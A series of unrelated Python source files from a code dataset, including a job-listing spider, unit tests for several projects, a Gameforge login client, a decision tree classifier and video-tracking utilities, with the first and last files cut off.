scrapy.http import Request\nfrom scrapy.selector import Selector\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, Replace, RemoveBadElements, md5_hash\n\n\nclass GreenHouseJobs(ATSSpider):\n\n name = 'greenhouse_jobs'\n functions_load = False\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath('//div[@class=\"opening\"]|//div[@class=\"row jobs\"]//ul/li')\n for job in jobs:\n job_url = job.xpath('./a/@href').extract()\n if job_url:\n meta = {\n 'title': job.xpath('./a/text()').extract(),\n 'loc': job.xpath('./span[@class=\"location\"]/text()|./text()').extract(),\n }\n yield Request(\n urljoin(response.url, job_url[0]), callback=self.parse_job_callback(),\n meta=meta\n )\n\n def parse_job(self, response):\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta.get('title'))\n loader.add_value('location', response.meta.get('loc'))\n loader.add_value(\n 'referencenumber', response.url, md5_hash, Prefix('%s-' % self.name)\n )\n loader.add_xpath(\n 'description',\n '//div[@id=\"content\"]/node()|//div[@class=\"large-9 columns job-description\"]/node()',\n RemoveBadElements(['a'])\n )\n loader.add_xpath(\n 'company',\n '//span[@class=\"company-name\"]/text()', Replace('at')\n )\n loader.add_xpath(\n 'jobcategory', '//strong[text()=\"Team:\"]/following-sibling::text()[1]', Replace('\\/\\/\\/')\n )\n if self.functions_load:\n self.load_functions_string(loader, response.meta.get('cat_name', ''))\n\n yield loader.load_item()\n\n def load_functions_string(self, loader, cat_name):\n pass\n","sub_path":"brightcorp/brightcorp/spiders/greenhouse_jobs.py","file_name":"greenhouse_jobs.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"238549489","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\n\nfrom pelican import signals\nfrom pelican.utils import truncate_html_words\nfrom pelican.generators import ArticlesGenerator\n\n\n\ndef truncate(generator):\n read_more = generator.settings.get('READ_MORE_RE',\n r'')\n read_more_re = re.compile(r'^(.*?)' + read_more, re.S)\n max_length = generator.settings.get('SUMMARY_MAX_LENGTH')\n for article in tuple(generator.articles):\n content = article.content\n match = read_more_re.search(content)\n if match:\n article._summary = match.group(1)\n else:\n article._summary = truncate_html_words(content, max_length)\n\n\ndef truncate_all(generators):\n for gen in generators:\n if isinstance(gen, ArticlesGenerator):\n truncate(gen)\n\n\ndef register():\n signals.all_generators_finalized.connect(truncate_all)\n","sub_path":"plugins/hatena_read_more.py","file_name":"hatena_read_more.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161600764","text":"import pytest\n\nimport numpy as np\nfrom persim import PersImage\n\ndef test_landscape():\n bds = np.array([[1,1],[1,2]])\n\n ldsp = PersImage.to_landscape(bds)\n\n np.testing.assert_array_equal(ldsp, [[1,0],[1,1]])\n\nclass TestWeighting:\n def test_zero_on_xaxis(self):\n pim = PersImage()\n\n wf = pim.weighting()\n\n assert wf([1,0]) == 0\n assert wf([100,0]) == 0\n assert wf([99, 1.4]) == 1.4\n\n def test_scales(self):\n pim = PersImage()\n\n wf = pim.weighting(np.array([[0,1],[1,2],[3,4]]))\n\n assert wf([1,0]) == 0\n assert wf([1,4]) == 1\n assert wf([1,2]) == .5\n \n\nclass TestKernels:\n def test_kernel_mean(self):\n pim = PersImage()\n kf = pim.kernel(2)\n\n data = np.array([[0,0]])\n assert kf(np.array([[0,0]]), [0,0]) >= kf(np.array([[1,1]]), [0,0]), \"decreasing away\"\n assert kf(np.array([[0,0]]), [1,1]) == kf(np.array([[1,1]]), [0,0]), \"symmetric\"\n\n\nclass TestTransforms:\n def test_n_pixels(self):\n pim = PersImage(pixels=9)\n diagram = np.array([[0,1], [1,1],[3,5]])\n img = pim.transform(diagram)\n\n assert img.shape == (3,3)\n\n def test_multiple_diagrams(self):\n pim = PersImage(pixels=9)\n \n diagram1 = np.array([[0,1], [1,1],[3,5]])\n diagram2 = np.array([[0,1], [1,1],[3,6]])\n imgs = pim.transform([diagram1, diagram2])\n\n assert len(imgs) == 2\n assert imgs[0].shape == imgs[1].shape\n\n@pytest.mark.skip()\nclass TestIntegration:\n \"\"\" We can't just take the center point, we need to integrate over the surface.\n\n It will be changing, so we need to ensure it works correctly.\n \"\"\"\n def test_integrate_constant(self):\n intr = Integrator()\n \n f = lambda center: 1\n assert np.allclose(intr.integrate(f, [0], 2), 1 * (2*2)**2)\n \n f = lambda center: 2\n assert np.allclose(intr.integrate(f, [0], 2), 2 * (2*2)**2)\n \n f = lambda center: 3\n assert np.allclose(intr.integrate(f, [0], 2), 3 * (2*2)**2)\n\n def test_integrate_(self):\n # I am not sure these are correct\n intr = Integrator()\n \n f = lambda center: center[0]\n \n assert np.allclose(intr.integrate(f, [0,10], 2), 32)\n \n f = lambda center: center[0]\n assert np.allclose(intr.integrate(f, [1,10], 2), 32)\n \n f = lambda center: center[0]\n assert np.allclose(intr.integrate(f, [2, 10], 2), 32)\n\n def test_coplanar(self):\n intr = Integrator()\n cube = np.array([[0,0,0],[1,0,0],[0,1,0],[1,1,0]])\n\n \n vol = intr._convex_hull_volume_bis(cube)\n assert np.allclose(vol, 0)\n\n def test_convex_hull_vol(self):\n intr = Integrator()\n\n cube = np.array([[0,0,0],[1,0,0],[0,1,0],[1,1,0],\n [0,0,1],[1,0,1],[0,1,1],[1,1,1]])\n\n vol = intr._convex_hull_volume_bis(cube)\n assert np.allclose(vol, 1)\n\n vol = intr._convex_hull_volume_bis(cube*2)\n assert np.allclose(vol, 8)\n","sub_path":"test/test_persim.py","file_name":"test_persim.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"148299296","text":"import pytest\n\nfrom glustolibs.gluster import volume_ops\n\nfrom openshiftstoragelibs.baseclass import BaseClass\nfrom openshiftstoragelibs import heketi_ops\nfrom openshiftstoragelibs import heketi_version\nfrom openshiftstoragelibs import podcmd\n\n\nclass TestHeketiBrickEvict(BaseClass):\n \"\"\"Test Heketi brick evict functionality.\"\"\"\n\n def setUp(self):\n super(TestHeketiBrickEvict, self).setUp()\n\n version = heketi_version.get_heketi_version(self.heketi_client_node)\n if version < '9.0.0-14':\n self.skipTest(\n \"heketi-client package {} does not support brick evict\".format(\n version.v_str))\n\n node_list = heketi_ops.heketi_node_list(\n self.heketi_client_node, self.heketi_server_url)\n\n if len(node_list) > 3:\n return\n\n for node_id in node_list:\n node_info = heketi_ops.heketi_node_info(\n self.heketi_client_node, self.heketi_server_url, node_id,\n json=True)\n if len(node_info[\"devices\"]) < 2:\n self.skipTest(\"does not have extra device/node to evict brick\")\n\n @podcmd.GlustoPod()\n def _get_gluster_vol_info(self, file_vol):\n \"\"\"Get Gluster vol info.\n\n Args:\n ocp_client (str): Node to execute OCP commands.\n file_vol (str): file volume name.\n\n Returns:\n dict: Info of the given gluster vol.\n \"\"\"\n g_vol_info = volume_ops.get_volume_info(\n \"auto_get_gluster_endpoint\", file_vol)\n\n if not g_vol_info:\n raise AssertionError(\"Failed to get volume info for gluster \"\n \"volume {}\".format(file_vol))\n if file_vol in g_vol_info:\n g_vol_info = g_vol_info.get(file_vol)\n return g_vol_info\n\n @pytest.mark.tier1\n def test_heketi_brick_evict(self):\n \"\"\"Test brick evict basic functionality and verify it replace a brick\n properly\n \"\"\"\n h_node, h_server = self.heketi_client_node, self.heketi_server_url\n\n size = 1\n vol_info_old = heketi_ops.heketi_volume_create(\n h_node, h_server, size, json=True)\n self.addCleanup(\n heketi_ops.heketi_volume_delete, h_node, h_server,\n vol_info_old['id'])\n heketi_ops.heketi_brick_evict(\n h_node, h_server, vol_info_old[\"bricks\"][0]['id'])\n\n vol_info_new = heketi_ops.heketi_volume_info(\n h_node, h_server, vol_info_old['id'], json=True)\n\n bricks_old = set({brick['path'] for brick in vol_info_old[\"bricks\"]})\n bricks_new = set({brick['path'] for brick in vol_info_new[\"bricks\"]})\n self.assertEqual(\n len(bricks_new - bricks_old), 1,\n \"Brick was not replaced with brick evict for vol \\n {}\".format(\n vol_info_new))\n\n gvol_info = self._get_gluster_vol_info(vol_info_new['name'])\n gbricks = set(\n {brick['name'].split(\":\")[1]\n for brick in gvol_info[\"bricks\"][\"brick\"]})\n self.assertEqual(\n bricks_new, gbricks, \"gluster vol info and heketi vol info \"\n \"mismatched after brick evict {} \\n {}\".format(\n gvol_info, vol_info_new))\n","sub_path":"tests/functional/heketi/test_heketi_brick_evict.py","file_name":"test_heketi_brick_evict.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"552958136","text":"import pytest\n\nfrom django.urls import reverse\n\nfrom stock.models import Company\nfrom stock.constants import STOCK_EXCHANGE\n\nfrom .factories import SectorFactory, CompanyFactory\n\n# this line is to mark that all tests in this module can integrate with db\npytestmark = pytest.mark.django_db\n\n\n\nHSX = STOCK_EXCHANGE[0][0]\n\n\n@pytest.fixture(scope='module')\ndef company_data():\n return {\n 'symbol': 'VNM',\n 'name': 'Công ty cổ phẩn sửa Việt Nam',\n 'description': 'Doanh nghiệp sữa lớn nhất Việt Nam',\n 'stock_exchange': HSX,\n }\n\n\ndef test_api_create_company(api_client, company_data, company_list_api):\n \"\"\"\n SUCCESS CASE: OK\n \"\"\"\n response = api_client.post(path=company_list_api,\n data=company_data,\n format='json')\n companies = Company.objects.all()\n\n # Assert conditions\n assert response.status_code == 201\n assert len(companies) == 1\n assert companies[0].symbol == company_data['symbol']\n\n\ndef test_api_create_company(api_client, company_data, company_list_api):\n \"\"\"\n FAIL CASE: missing a required field 'symbol' in parameters\n \"\"\"\n del company_data['symbol']\n\n response = api_client.post(path=company_list_api,\n data=company_data,\n format='json')\n\n # Assert conditions\n assert response.status_code == 400\n\n\ndef test_api_get_company_detail(api_client, company_detail_api):\n \"\"\"\n SUCCESS CASE: missing required field 'symbol'\n \"\"\"\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng Vietcombank',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n response = api_client.get(path=company_detail_api(vcb.symbol))\n\n # Assert conditions\n assert response.status_code == 200\n assert response.data['symbol'] == 'VCB'\n\n\ndef test_api_update_partial_company(api_client, company_detail_api):\n \"\"\"\n SUCCESS CASE: missing required field 'symbol'\n \"\"\"\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng ACB',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n payload = {\n 'name': 'Ngân hàng VCB'\n }\n response = api_client.patch(path=company_detail_api(vcb.symbol),\n data=payload,\n format='json')\n\n company = Company.objects.get(pk=vcb.id)\n\n # Assert conditions\n assert response.status_code == 200\n assert company.name == 'Ngân hàng VCB'\n print(response.data)\n\n\ndef test_api_list_company(api_client, company_list_api):\n # init data for Company in database\n vcb = CompanyFactory(\n symbol='VCB',\n name='Ngân hàng Vietcombank',\n description='Ngân hàng to nhất Việt Nam',\n sector=SectorFactory()\n )\n\n vic = CompanyFactory(\n symbol='VIC',\n name='Tập đoàn group',\n description='Tập đoàn lớn nhất Việt Nam',\n sector=SectorFactory()\n )\n\n response = api_client.get(path=company_list_api)\n\n # Assert conditions\n assert response.status_code == 200\n assert len(response.data) == 2\n","sub_path":"mysite/tests/test_company_api.py","file_name":"test_company_api.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"466216990","text":"# -*- coding: utf-8 -*-\nfrom twisted.trial import unittest\nfrom twisted.internet import defer, reactor\nfrom pc import models\n\n\nclass TestSave(unittest.TestCase):\n\n def setUp(self):\n models.gChoices = {models.proc:[], models.video:[]}\n models.gChoices_flatten = {}\n\n def makeTestModel(self, items):\n return models.Model({'_id':'test_model',\n 'items':items})\n\n\n def test_findComponent(self):\n model = self.makeTestModel({models.proc:'test proc'})\n found = model.findComponent(models.proc)\n\n self.assertTrue(found['price'] == 10)\n self.assertTrue(found['_id'] == 'test proc')\n self.assertFalse(found['replaced'])\n\n models.gChoices_flatten = {'test proc':{'_id':'replaced proc', 'price':20}}\n found1 = model.findComponent(models.proc)\n\n self.assertTrue(found1['price'] == 20)\n self.assertTrue(found1['_id'] == 'replaced proc')\n self.assertTrue(found1['replaced'])\n\n\n def test_buildProcAndVideo(self):\n model = self.makeTestModel({models.proc:'test proc',\n models.video:'test video'})\n proc_video = model.buildProcAndVideo()\n self.assertTrue(proc_video['proc_catalog'] == 'no')\n self.assertTrue(proc_video['video_catalog'] == 'no')\n","sub_path":"test/test_save.py","file_name":"test_save.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"209368642","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n***************************************************************************\n TestTools.py\n ---------------------\n Date : February 2013\n Copyright : (C) 2013 by Victor Olaya\n Email : volayaf at gmail dot com\n***************************************************************************\n* *\n* This program is free software; you can redistribute it and/or modify *\n* it under the terms of the GNU General Public License as published by *\n* the Free Software Foundation; either version 2 of the License, or *\n* (at your option) any later version. *\n* *\n***************************************************************************\n\"\"\"\n\n__author__ = 'Victor Olaya'\n__date__ = 'February 2013'\n__copyright__ = '(C) 2013, Victor Olaya'\n\n# This will get replaced with a git SHA1 when you do a git archive\n\n__revision__ = '$Format:%H$'\n\nimport os\nimport yaml\nimport hashlib\n\nfrom osgeo import gdal\nfrom osgeo.gdalconst import GA_ReadOnly\n\nfrom PyQt4.QtCore import QCoreApplication, QMetaObject\nfrom PyQt4.QtGui import QMessageBox, QDialog, QVBoxLayout, QTextEdit\n\nfrom processing.core.Processing import Processing\nfrom processing.core.outputs import (\n OutputNumber,\n OutputString,\n OutputRaster,\n OutputVector,\n OutputHTML\n)\n\nfrom processing.core.parameters import (\n ParameterRaster,\n ParameterVector,\n ParameterMultipleInput\n)\n\n\ndef extractSchemaPath(filepath):\n \"\"\"\n Trys to find where the file is relative to the QGIS source code directory.\n If it is already placed in the processing or QGIS testdata directory it will\n return an appropriate schema and relative filepath\n\n Args:\n filepath: The path of the file to examine\n\n Returns:\n A tuple (schema, relative_file_path) where the schema is 'qgs' or 'proc'\n if we can assume that the file is in this testdata directory.\n \"\"\"\n parts = []\n schema = None\n localpath = ''\n path = filepath\n part = True\n\n while part:\n (path, part) = os.path.split(path)\n if part == 'testdata' and not localpath:\n localparts = parts\n localparts.reverse()\n localpath = os.path.join(*localparts)\n\n parts.append(part)\n\n parts.reverse()\n\n try:\n testsindex = parts.index('tests')\n except ValueError:\n return '', filepath\n\n if parts[testsindex - 1] == 'processing':\n schema = 'proc'\n\n return schema, localpath\n\n\ndef createTest(text):\n definition = {}\n\n tokens = text[len('processing.runalg('):-1].split(',')\n cmdname = (tokens[0])[1:-1]\n alg = Processing.getAlgorithm(cmdname)\n\n definition['name'] = 'Test ({})'.format(cmdname)\n definition['algorithm'] = cmdname\n\n params = {}\n results = {}\n\n i = 0\n for param in alg.parameters:\n if param.hidden:\n continue\n\n i += 1\n token = tokens[i]\n\n if isinstance(param, ParameterVector):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n p = {\n 'type': 'vector',\n 'name': filepath\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n elif isinstance(param, ParameterRaster):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n p = {\n 'type': 'raster',\n 'name': filepath\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n elif isinstance(param, ParameterMultipleInput):\n multiparams = token[1:-1].split(';')\n newparam = []\n for mp in multiparams:\n schema, filepath = extractSchemaPath(mp)\n newparam.append({\n 'type': 'vector',\n 'name': filepath\n })\n p = {\n 'type': 'multi',\n 'params': newparam\n }\n if not schema:\n p['location'] = '[The source data is not in the testdata directory. Please use data in the processing/tests/testdata folder.]'\n\n params[param.name] = p\n else:\n params[param.name] = token\n\n definition['params'] = params\n\n for i, out in enumerate([out for out in alg.outputs if not out.hidden]):\n token = tokens[i - alg.getVisibleOutputsCount()]\n\n if isinstance(out, (OutputNumber, OutputString)):\n results[out.name] = unicode(out)\n elif isinstance(out, OutputRaster):\n filename = token[1:-1]\n dataset = gdal.Open(filename, GA_ReadOnly)\n strhash = hashlib.sha224(dataset.ReadAsArray(0).data).hexdigest()\n\n results[out.name] = {\n 'type': 'rasterhash',\n 'hash': strhash\n }\n elif isinstance(out, OutputVector):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n results[out.name] = {\n 'type': 'vector',\n 'name': filepath\n }\n if not schema:\n results[out.name]['location'] = '[The expected result data is not in the testdata directory. Please write it to processing/tests/testdata/expected. Prefer gml files.]'\n elif isinstance(out, OutputHTML):\n filename = token[1:-1]\n schema, filepath = extractSchemaPath(filename)\n results[out.name] = {\n 'type': 'file',\n 'name': filepath\n }\n if not schema:\n results[out.name]['location'] = '[The expected result file is not in the testdata directory. Please redirect the output to processing/tests/testdata/expected.]'\n\n definition['results'] = results\n\n dlg = ShowTestDialog(yaml.dump([definition], default_flow_style=False))\n dlg.exec_()\n\n\ndef tr(string):\n return QCoreApplication.translate('TestTools', string)\n\n\nclass ShowTestDialog(QDialog):\n\n def __init__(self, s):\n QDialog.__init__(self)\n self.setModal(True)\n self.resize(600, 400)\n self.setWindowTitle(self.tr('Unit test'))\n layout = QVBoxLayout()\n self.text = QTextEdit()\n self.text.setFontFamily(\"monospace\")\n self.text.setEnabled(True)\n self.text.setText(s)\n layout.addWidget(self.text)\n self.setLayout(layout)\n QMetaObject.connectSlotsByName(self)\n","sub_path":"processing/gui/TestTools.py","file_name":"TestTools.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"153965523","text":"import requests\nimport binascii\n\nclass NtLauncher:\n def __init__(self, locale, gfLang, installation_id):\n self.locale = locale\n self.gfLang = gfLang\n self.installation_id = installation_id\n self.token = None\n self.platformUserId = None\n\n def auth(self, username, password):\n self.username = username\n self.password = password\n\n URL = \"https://spark.gameforge.com/api/v1/auth/thin/sessions\"\n HEADERS = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\"\n }\n\n CONTENT = {\n \"gfLang\" : self.gfLang,\n \"identity\" : self.username,\n \"locale\" : self.locale,\n \"password\" : self.password,\n \"platformGameId\" : \"dd4e22d6-00d1-44b9-8126-d8b40e0cd7c9\"\n }\n\n r = requests.post(URL, headers=HEADERS, json=CONTENT)\n if r.status_code != 201:\n return False\n \n response = r.json()\n self.token = response[\"token\"]\n self.platformUserId = response[\"platformUserId\"]\n\n return True\n \n def getAccounts(self):\n if not self.token or not self.platformUserId:\n return False\n \n URL = \"https://spark.gameforge.com/api/v1/user/accounts\"\n\n HEADERS = {\n \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\",\n \"Authorization\" : \"Bearer {}\".format(self.token),\n \"Connection\" : \"Keep-Alive\"\n }\n\n r = requests.get(URL, headers=HEADERS)\n\n if r.status_code != 200:\n return False\n\n return list(r.json().keys())\n\n def _convertToken(self, guid):\n return binascii.hexlify(guid.encode()).decode()\n\n def getToken(self, account):\n if not self.token or not self.platformUserId:\n return False\n \n URL = \"https://spark.gameforge.com/api/v1/auth/thin/codes\"\n\n HEADERS = {\n \"User-Agent\" : \"GameforgeClient/2.0.48\",\n \"TNT-Installation-Id\" : self.installation_id,\n \"Origin\" : \"spark://www.gameforge.com\",\n \"Authorization\" : \"Bearer {}\".format(self.token),\n \"Connection\" : \"Keep-Alive\"\n }\n\n CONTENT = {\n \"platformGameAccountId\" : account\n }\n\n r = requests.post(URL, headers=HEADERS, json=CONTENT)\n\n if r.status_code != 201:\n return False\n\n return self._convertToken(r.json()[\"code\"])\n","sub_path":"ntauth/loginapi.py","file_name":"loginapi.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"177171069","text":"import requests\nimport datetime\nfrom pytz import timezone\n\n\ndef get_number_of_pages(url):\n return requests.get(url).json()['number_of_pages']\n\n\ndef get_list_of_attempts(number_of_pages, url):\n attempts = []\n for number_of_page in range(1, number_of_pages):\n page = {'page': number_of_page}\n response = requests.get(url, params=page).json()['records']\n for item in range(1, len(response)):\n attempts.append(response[item])\n return attempts\n\n\ndef get_midnighters(attempts):\n midnighters = set()\n midnight = datetime.time(0)\n morning = datetime.time(6)\n existing_timestamp = filter(lambda x: x['timestamp'] is not None, attempts)\n for attempt in existing_timestamp:\n tz = timezone(attempt['timezone'])\n srv_time = attempt['timestamp']\n user_time = tz.localize(datetime.datetime.fromtimestamp(srv_time))\n if midnight < user_time.time() < morning:\n midnighters.add(attempt['username'])\n return midnighters\n\n\nif __name__ == '__main__':\n url = 'http://devman.org/api/challenges/solution_attempts/'\n number_of_pages = get_number_of_pages(url)\n attempts = get_list_of_attempts(number_of_pages, url)\n print (get_midnighters(attempts))\n","sub_path":"seek_dev_nighters.py","file_name":"seek_dev_nighters.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"429665480","text":"from numpy import matrix, sin, cos\nZ = lambda theta : matrix([[cos(theta), -sin(theta), 0],[sin(theta), cos(theta), 0],[0,0,1]])\nY = lambda phi : matrix([[cos(phi),0, sin(phi)],[0,1,0],[-sin(phi), 0, cos(phi)]])\nX = lambda alpha : matrix([[1,0,0],[0, cos(alpha), -sin(alpha)],[0, sin(alpha), cos(alpha)]])\n\n#euler rotationMatrices Convention\nXYZ = lambda alpha, phi, theta : X(alpha)*Y(phi)*Z(theta)\nZXY = lambda alpha, phi, theta : Z(theta)*X(alpha)*Y(phi)\nYXZ = lambda alpha, phi, theta : Y(theta)*X(alpha)*Z(phi)\n\nZXZ = lambda theta, alpha, theta2 : Z(theta)*X(alpha)*Z(theta2)\nZYZ = lambda theta, phi, theta2 : Z(theta)*Y(phi)*Z(theta2)\nZYX = lambda theta, phi, alpha : Z(theta)*Y(phi)*X(alpha)\n\ntransform = lambda atom_coords, center, shift, rotationMatrix: rotationMatrix*(atom_coords - center)+shift","sub_path":"libraries/rotationMatrices.py","file_name":"rotationMatrices.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"161724341","text":"# Version 1.0\nimport numpy as np\nimport pandas as pd\n\nclass DecisionTreeClassifier:\n \"\"\" A basic ID3 Decision Tree\"\"\"\n\n def __init__(self, dataset, nFeatures=0):\n self.dataset = dataset\n self.tree = pd.Series(dtype=object)\n self.nFeatures = nFeatures\n self.make_tree(self.dataset.examples, self.tree)\n \n def entropy(self, df):\n p = df.iloc[:, -1].value_counts() / len(df)\n return (-p * np.log2(p)).sum()\n\n def info_gain(self, df, feature):\n p = df[feature].value_counts() / len(df)\n\n for v in p.index:\n p.loc[v] *= self.entropy(df[df[feature] == v])\n\n return self.entropy(df) - p.sum()\n\n def best_feature(self, df):\n features = df.columns[:-1].copy().values\n if self.nFeatures != 0:\n f_indexes = np.arange(min(self.nFeatures, len(features)))\n np.random.shuffle(f_indexes)\n features = features[f_indexes]\n \n info = pd.DataFrame({\"feature\": features})\n info['gain'] = [self.info_gain(df, f) for f in features]\n return info['feature'][info['gain'].argmax()]\n \n\n def print_tree(self, name='', node=None, depth=1):\n if node is None:\n node = self.tree\n \n for f in node.index:\n if isinstance(node[f], tuple):\n if f != '-^-':\n print(' ' * depth, f, ' => ', node[f], sep='')\n else:\n print(' ' * depth, f, ': ', sep='')\n self.print_tree(f, node[f], depth + 1)\n \n def make_tree(self, df, node, feature=None):\n if feature is None:\n feature = self.best_feature(df)\n \n node[feature] = pd.Series(dtype=object)\n \n # Store the plurality vote class at the feature level\n # under a \"hidden\" _^_ key just in case we need it for\n # when the unseen example does not lead to a leaf.\n node[feature]['-^-'] = (feature, df.iloc[:, -1].mode()[0])\n \n fvalues = df[feature].unique()\n for v in fvalues:\n d = df[df[feature] == v]\n n_classes = len(d.iloc[:, -1].unique())\n if n_classes == 1:\n node[feature][v] = ('L', d.iloc[:, -1].iloc[0])\n elif n_classes > 1:\n d = d.drop([feature], axis=1)\n if len(d.columns) == 1: \n node[feature][v] = ('L', d.iloc[:, -1].mode()[0])\n else:\n next_best_feature = self.best_feature(d)\n node[feature][v] = pd.Series(dtype=object)\n self.make_tree(d, node[feature][v] ,next_best_feature)\n else:\n pass\n\n def predict(self, unseen, node=None):\n \"\"\"\n Returns the most probable label (or class) for each unseen input. The\n unseen needs to be a data series with the same features (as indexes) as the \n training data. It can also be a data frame with the same features as \n the training data.\n \"\"\"\n if unseen.ndim == 1:\n if node is None:\n node = self.tree\n\n feature = node.index[0]\n children = node[feature]\n value = unseen[feature]\n for c in children.index:\n if c == value:\n if isinstance(children[c], tuple):\n return children[c][1]\n else:\n return self.predict(unseen, children[c])\n \n # If this is reached, then a leaf was not reached. We return\n # a plurality vote at the deepest node reached.\n return children['-^-'][1]\n else:\n return np.array([self.predict(unseen.iloc[i,:]) for i in range(len(unseen))]) \n \n def __repr__(self):\n return repr(self.tree)\n \n","sub_path":"mylib/decision_tree_classifier.py","file_name":"decision_tree_classifier.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"222097157","text":"import os\nimport glob\nimport math\nimport pickle\n\nimport torch\nimport numpy as np\nfrom tqdm import tqdm\nfrom scipy.interpolate import griddata\n\nfrom video_cap import VideoCap\n\n\ndef load_detections(det_file, num_frames):\n detections = []\n raw_data = np.genfromtxt(det_file, delimiter=',')\n for frame_idx in range(num_frames):\n idx = np.where(raw_data[:, 0] == frame_idx+1)\n if idx[0].size:\n detections.append(np.stack(raw_data[idx], axis=0)[:, 2:6])\n else:\n detections.append(np.empty(shape=(0,10)))\n return detections\n\n\ndef load_groundtruth(gt_file, only_eval=False):\n \"\"\"\n Args:\n gt_file (string): Full path of a MOT groundtruth txt file.\n\n only_eval (bool): If False load all groundtruth entries, otherwise\n load only entries in which column 7 is 1 indicating an entry that\n is to be considered during evaluation.\n \"\"\"\n gt_boxes = []\n gt_ids = []\n gt_classes = []\n raw_data = np.genfromtxt(gt_file, delimiter=',')\n for frame_idx in sorted(set(raw_data[:, 0])):\n idx = np.where(raw_data[:, 0] == frame_idx)\n gt_box = np.stack(raw_data[idx], axis=0)[:, 2:6]\n gt_id = np.stack(raw_data[idx], axis=0)[:, 1]\n gt_class = np.stack(raw_data[idx], axis=0)[:, 7]\n consider_in_eval = np.stack(raw_data[idx], axis=0)[:, 6]\n consider_in_eval = consider_in_eval.astype(np.bool)\n if only_eval:\n gt_box = gt_box[consider_in_eval]\n gt_id = gt_id[consider_in_eval]\n gt_boxes.append(gt_box)\n gt_ids.append(gt_id)\n gt_classes.append(gt_class)\n return gt_ids, gt_boxes, gt_classes\n\n\ndef normalize_vectors(motion_vectors):\n \"\"\"Normalizes motion vectors to the past frame as reference frame.\n\n The source value in the first column is set to -1 for all frames. The x and\n y motion values are scaled accordingly. Vector source position and\n destination position are unchanged.\n\n Args:\n motion_vectors (`numpy.ndarray`): Array of shape (N, 11) containing all\n N motion vectors inside a frame. N = 0 is allowed meaning no vectors\n are present in the frame.\n\n Returns:\n motion_vectors (`numpy.ndarray`): Array of shape (M, 11) containing the\n normalized motion vectors. If N = 0 => M = 0 that is an empty numpy\n array of shape (0, 11) is returned.\n \"\"\"\n if np.shape(motion_vectors)[0] == 0:\n return motion_vectors\n else:\n motion_vectors[:, 7] = motion_vectors[:, 7] / motion_vectors[:, 0] # motion_x\n motion_vectors[:, 8] = motion_vectors[:, 8] / motion_vectors[:, 0] # motion_y\n motion_vectors[:, 0] = -1 * np.ones_like(motion_vectors[:, 0])\n return motion_vectors\n\n\ndef interp_motion_vectors(motion_vectors, frame_shape=(1920, 1080)):\n mvs_x = motion_vectors[:, 5]\n mvs_y = motion_vectors[:, 6]\n mvs_x_motion = motion_vectors[:, 7] / motion_vectors[:, 9]\n mvs_y_motion = motion_vectors[:, 8] / motion_vectors[:, 9]\n # takes 5.72 ms (average of 1000 runs)\n xi = np.arange(8, frame_shape[0]+1, 16)\n yi = np.arange(8, frame_shape[1]+1, 16)\n mvs_x_motion_interp = griddata((mvs_x, mvs_y), mvs_x_motion, (xi[None, :], yi[:, None]), method='nearest')\n mvs_y_motion_interp = griddata((mvs_x, mvs_y), mvs_y_motion, (xi[None, :], yi[:, None]), method='nearest')\n return mvs_x_motion_interp, mvs_y_motion_interp\n\n\ndef motion_vectors_to_grid(motion_vectors, frame_shape=(1920, 1080)):\n \"\"\"Converts motion vectors list into 3D matrix.\"\"\"\n motion_vectors_grid = np.zeros((2, math.ceil(frame_shape[1]/16), math.ceil(frame_shape[0]/16)))\n mvs_x = motion_vectors[:, 5]\n 